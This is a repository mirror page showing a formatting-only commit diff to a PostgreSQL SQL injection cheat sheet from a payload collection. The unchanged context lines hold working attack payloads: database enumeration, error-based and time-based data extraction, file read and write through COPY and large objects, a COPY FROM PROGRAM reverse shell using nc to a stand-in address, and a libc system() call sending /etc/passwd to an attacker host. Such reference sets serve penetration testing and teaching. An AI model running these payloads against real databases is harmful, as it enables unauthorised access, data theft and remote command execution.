gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-19 16:10:27 -08:00
Code Issues Packages Projects Releases Wiki Activity

Markdown Linting - SQL, Juggling, XSLT, XSS, Zip

Browse Source
This commit is contained in:
Swissky
2025-03-26 20:53:03 +01:00
parent bad860d79d
commit 2611dd1ba3
24 changed files with 445 additions and 646 deletions
Download Patch File Download Diff File Expand all files Collapse all files

50
SQL Injection/PostgreSQL Injection.md
View File

@@ -2,7 +2,6 @@
> PostgreSQL SQL injection refers to a type of security vulnerability where attackers exploit improperly sanitized user input to execute unauthorized SQL commands within a PostgreSQL database.
## Summary
* [PostgreSQL Comments](#postgresql-comments)
@@ -28,7 +27,6 @@
* [PostgreSQL Superuser Role](#postgresql-superuser-role)
* [References](#references)
## PostgreSQL Comments
| Type | Comment |
@@ -36,12 +34,11 @@
| Single-Line Comment | `--` |
| Multi-Line Comment | `/**/` |
## PostgreSQL Enumeration
| Description | SQL Query |
| ---------------------- | --------------------------------------- |
| DBMS version | `SELECT version()` |
| DBMS version | `SELECT version()` |
| Database Name | `SELECT CURRENT_DATABASE()` |
| Database Schema | `SELECT CURRENT_SCHEMA()` |
| List PostgreSQL Users | `SELECT usename FROM pg_user` |
@@ -53,19 +50,17 @@
| Current User | `SELECT usename FROM pg_user;` |
| Current User | `SELECT getpgusername();` |
## PostgreSQL Methodology
| Description | SQL Query |
| ---------------------- | -------------------------------------------- |
| List Schemas | `SELECT DISTINCT(schemaname) FROM pg_tables` |
| List Databases | `SELECT datname FROM pg_database` |
| List Databases | `SELECT datname FROM pg_database` |
| List Tables | `SELECT table_name FROM information_schema.tables` |
| List Tables | `SELECT table_name FROM information_schema.tables WHERE table_schema='<SCHEMA_NAME>'` |
| List Tables | `SELECT tablename FROM pg_tables WHERE schemaname = '<SCHEMA_NAME>'` |
| List Columns | `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` |
## PostgreSQL Error Based
| Name | Payload |
@@ -75,8 +70,6 @@
| CAST | `AND CAST((SELECT version()) AS INT)=1337 -- -` |
| CAST | `AND (SELECT version())::int=1 -- -` |
```sql
CAST(chr(126)||VERSION()||chr(126) AS NUMERIC)
CAST(chr(126)||(SELECT table_name FROM information_schema.tables LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)--
@@ -106,16 +99,15 @@ SELECT database_to_xmlschema(true,true,''); -- dump the current db to an XML sch
Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
## PostgreSQL Blind
### PostgreSQL Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------------- |
| ----------- | ----------------------------------------------- |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar' FROM <START> FOR <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar' FROM <START> FOR <LENGTH>)` |
Examples:
@@ -124,10 +116,9 @@ Examples:
' and substr(version(),1,10) = 'PostgreXXX' and '1 -- FALSE
```
## PostgreSQL Time Based
#### Identify Time Based
### Identify Time Based
```sql
select 1 from pg_sleep(5)
@@ -135,19 +126,19 @@ select 1 from pg_sleep(5)
||(select 1 from pg_sleep(5))
```
#### Database Dump Time Based
### Database Dump Time Based
```sql
select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
```
#### Table Dump Time Based
### Table Dump Time Based
```sql
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
```
#### Columns Dump Time Based
### Columns Dump Time Based
```sql
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
@@ -162,7 +153,7 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
## PostgreSQL Out of Band
Out-of-band SQL injections in PostgreSQL relies on the use of functions that can interact with the file system or network, such as `COPY`, `lo_export`, or functions from extensions that can perform network actions. The idea is to exploit the database to send data elsewhere, which the attacker can monitor and intercept.
Out-of-band SQL injections in PostgreSQL relies on the use of functions that can interact with the file system or network, such as `COPY`, `lo_export`, or functions from extensions that can perform network actions. The idea is to exploit the database to send data elsewhere, which the attacker can monitor and intercept.
```sql
declare c text;
@@ -176,7 +167,6 @@ $$ language plpgsql security definer;
SELECT f();
```
## PostgreSQL Stacked Query
Use a semi-colon "`;`" to add another query
@@ -185,7 +175,6 @@ Use a semi-colon "`;`" to add another query
SELECT 1;CREATE TABLE NOTSOSECURE (DATA VARCHAR(200));--
```
## PostgreSQL File Manipulation
### PostgreSQL File Read
@@ -215,7 +204,6 @@ NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_fil
SELECT * from pg_largeobject; -- or just get all the large objects and their data
```
### PostgreSQL File Write
* Using `COPY`
@@ -241,7 +229,6 @@ NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_fil
SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
```
## PostgreSQL Command Execution
### Using COPY TO/FROM PROGRAM
@@ -257,7 +244,6 @@ CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f';
```
### Using libc.so.6
```sql
@@ -265,7 +251,6 @@ CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
```
## PostgreSQL WAF Bypass
### Alternative to Quotes
@@ -275,7 +260,6 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
| `SELECT CHR(65)\|\|CHR(66)\|\|CHR(67);` | String from `CHR()` |
| `SELECT $TAG$This` | Dollar-sign ( >= version 8 PostgreSQL) |
## PostgreSQL Privileges
### PostgreSQL List Privileges
@@ -296,10 +280,10 @@ SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
## References
- [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
- [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
- [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
- [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
- [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
- [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://hackerone.com/reports/181803)
- [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli)
* [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
* [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
* [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://hackerone.com/reports/181803)
* [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli)